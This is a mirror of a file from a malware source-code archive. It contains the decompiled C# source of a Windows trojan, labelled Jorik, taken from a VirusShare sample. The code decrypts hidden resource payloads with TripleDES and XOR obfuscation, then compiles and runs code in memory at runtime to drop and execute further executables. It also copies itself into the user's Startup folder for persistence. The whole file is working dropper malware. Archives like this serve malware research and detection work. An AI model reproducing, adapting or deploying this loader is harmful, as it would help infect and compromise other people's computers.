mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
203 lines
7.5 KiB
C#
203 lines
7.5 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: A
|
|
// Assembly: test5, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 5FEE5512-A04F-4880-B9BA-64F946A180EC
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Jorik.Llac.aki-6131c450a642a62ff8934573df43ef2a61b7fe73cdf48e5237cb51121cc94ce8.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.CodeDom.Compiler;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Resources;
|
|
using System.Security.Cryptography;
|
|
using System.Text;
|
|
using System.Windows.Forms;
|
|
|
|
public class A
|
|
{
|
|
private static string StrPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + Path.GetFileName(Application.ExecutablePath);
|
|
private static string[] Arry;
|
|
private static CompilerResults CRS;
|
|
private static CompilerParameters PR = new CompilerParameters();
|
|
private static CodeDomProvider CI;
|
|
|
|
[STAThread]
|
|
public static void Main()
|
|
{
|
|
ResourceManager resourceManager = new ResourceManager(nameof (A), Assembly.LoadFile(Application.ExecutablePath));
|
|
string input = Conversions.ToString(resourceManager.GetObject("Na"));
|
|
string key = Conversions.ToString(resourceManager.GetObject("K"));
|
|
string str1 = Encoding.Default.GetString(A.ENC(input, key));
|
|
int int32 = Convert.ToInt32(Conversions.ToString(1011100), 2);
|
|
char ch;
|
|
for (int CharCode = 0; CharCode <= int32; ++CharCode)
|
|
ch = Strings.Chr(CharCode);
|
|
string str2 = Interaction.Environ(A.Scram(Conversions.ToString(resourceManager.GetObject("X")))) + Conversions.ToString(ch) + str1 + ".exe";
|
|
try
|
|
{
|
|
byte[] numArray1 = A.ENC(Conversions.ToString(resourceManager.GetObject("Inj")), key);
|
|
A.LM("C", "T", A.Scram(Conversions.ToString(resourceManager.GetObject("L"))), new object[2]
|
|
{
|
|
(object) str2,
|
|
(object) numArray1
|
|
});
|
|
byte[] numArray2 = A.ENC(Conversions.ToString(resourceManager.GetObject("Z0")), key);
|
|
A.LM("IX", "AA", A.Scram(Conversions.ToString(resourceManager.GetObject("R"))), new object[2]
|
|
{
|
|
(object) numArray2,
|
|
(object) str2
|
|
});
|
|
int integer = Conversions.ToInteger(resourceManager.GetObject("i"));
|
|
if (integer != 1)
|
|
{
|
|
int num = integer - 1;
|
|
for (int index = 0; index <= num; ++index)
|
|
{
|
|
string Left = Interaction.Environ(A.Scram(Conversions.ToString(resourceManager.GetObject("X")))) + A.Scram(Conversions.ToString(resourceManager.GetObject("J")));
|
|
int CharCode = 70;
|
|
switch (index)
|
|
{
|
|
case 0:
|
|
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode)) + Conversions.ToString(Strings.Chr(CharCode)))));
|
|
break;
|
|
case 1:
|
|
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode + 13)) + Conversions.ToString(Strings.Chr(CharCode + 13)))));
|
|
break;
|
|
case 2:
|
|
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode + 14)) + Conversions.ToString(Strings.Chr(CharCode + 14)))));
|
|
break;
|
|
case 3:
|
|
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode + 15)) + Conversions.ToString(Strings.Chr(CharCode + 15)))));
|
|
break;
|
|
}
|
|
byte[] numArray3 = A.ENC(Conversions.ToString(resourceManager.GetObject("Z" + Conversions.ToString(index + 1))), key);
|
|
A.LM("C", "T", A.Scram(Conversions.ToString(resourceManager.GetObject("L"))), new object[2]
|
|
{
|
|
(object) Left,
|
|
(object) numArray3
|
|
});
|
|
A.LM("S", "SS", A.Scram(Conversions.ToString(resourceManager.GetObject("Y"))), new object[1]
|
|
{
|
|
(object) Left
|
|
});
|
|
}
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
A.SNPersistence();
|
|
}
|
|
|
|
public static string Reverser(string s)
|
|
{
|
|
s = s.Replace('#', 'e');
|
|
s = s.Replace(Strings.Chr(195), 'a');
|
|
s = s.Replace(Strings.Chr(200), 'i');
|
|
char[] charArray = s.ToCharArray();
|
|
Array.Reverse((Array) charArray);
|
|
return new string(charArray);
|
|
}
|
|
|
|
public static string EN_DES(string b, string c, bool d)
|
|
{
|
|
byte[] bytes;
|
|
if (d)
|
|
bytes = (byte[]) NewLateBinding.LateGet((object) new MD5CryptoServiceProvider(), (System.Type) null, "ComputeHash", new object[1]
|
|
{
|
|
(object) Encoding.UTF8.GetBytes(c)
|
|
}, (string[]) null, (System.Type[]) null, (bool[]) null);
|
|
else
|
|
bytes = Encoding.UTF8.GetBytes(c);
|
|
object Instance = (object) new TripleDESCryptoServiceProvider();
|
|
NewLateBinding.LateSet(Instance, (System.Type) null, "Key", new object[1]
|
|
{
|
|
(object) bytes
|
|
}, (string[]) null, (System.Type[]) null);
|
|
NewLateBinding.LateSet(Instance, (System.Type) null, "Mode", new object[1]
|
|
{
|
|
(object) CipherMode.ECB
|
|
}, (string[]) null, (System.Type[]) null);
|
|
NewLateBinding.LateSet(Instance, (System.Type) null, "Padding", new object[1]
|
|
{
|
|
(object) PaddingMode.PKCS7
|
|
}, (string[]) null, (System.Type[]) null);
|
|
return Encoding.UTF8.GetString(((ICryptoTransform) NewLateBinding.LateGet(Instance, (System.Type) null, "CreateDecryptor", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)).TransformFinalBlock(Convert.FromBase64String(b), 0, Convert.FromBase64String(b).Length));
|
|
}
|
|
|
|
public static byte[] ENC(string input, string key = null) => Encoding.Default.GetBytes(A.EN_DES(input, key, true));
|
|
|
|
public static void SNPersistence()
|
|
{
|
|
string str = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + Path.GetFileName(Application.ExecutablePath);
|
|
try
|
|
{
|
|
if (File.Exists(str))
|
|
return;
|
|
File.Copy(Application.ExecutablePath, str);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
}
|
|
|
|
public static string Scram(string I) => Encoding.Default.GetString(A.XQ(Encoding.Default.GetBytes(I), new byte[1]
|
|
{
|
|
(byte) 1
|
|
}));
|
|
|
|
public static byte[] XQ(byte[] E, byte[] P)
|
|
{
|
|
int length = P.Length;
|
|
int num = E.Length - 1;
|
|
for (int index = 0; index <= num; ++index)
|
|
E[index] = (byte) ((int) E[index] ^ (int) P[index % length]);
|
|
return E;
|
|
}
|
|
|
|
private static bool LM(string C, string V, string F, object[] P)
|
|
{
|
|
bool boolean;
|
|
try
|
|
{
|
|
A.Arry = new string[3]
|
|
{
|
|
"CSharp",
|
|
"System.dll",
|
|
"/platform:x86 /unsafe"
|
|
};
|
|
A.CI = CodeDomProvider.CreateProvider(A.Arry[0]);
|
|
A.Para();
|
|
A.CRS = A.CI.CompileAssemblyFromSource(A.PR, F);
|
|
System.Type type = A.CRS.CompiledAssembly.GetType(C);
|
|
if ((object) type != null)
|
|
{
|
|
MethodInfo method = type.GetMethod(V);
|
|
if ((object) method != null)
|
|
boolean = Conversions.ToBoolean(method.Invoke((object) null, P));
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
return boolean;
|
|
}
|
|
|
|
public static void Para()
|
|
{
|
|
A.PR.GenerateExecutable = false;
|
|
A.PR.GenerateInMemory = true;
|
|
A.PR.ReferencedAssemblies.Add(A.Arry[1]);
|
|
A.PR.CompilerOptions = A.Arry[2];
|
|
A.PR.TreatWarningsAsErrors = false;
|
|
}
|
|
}
|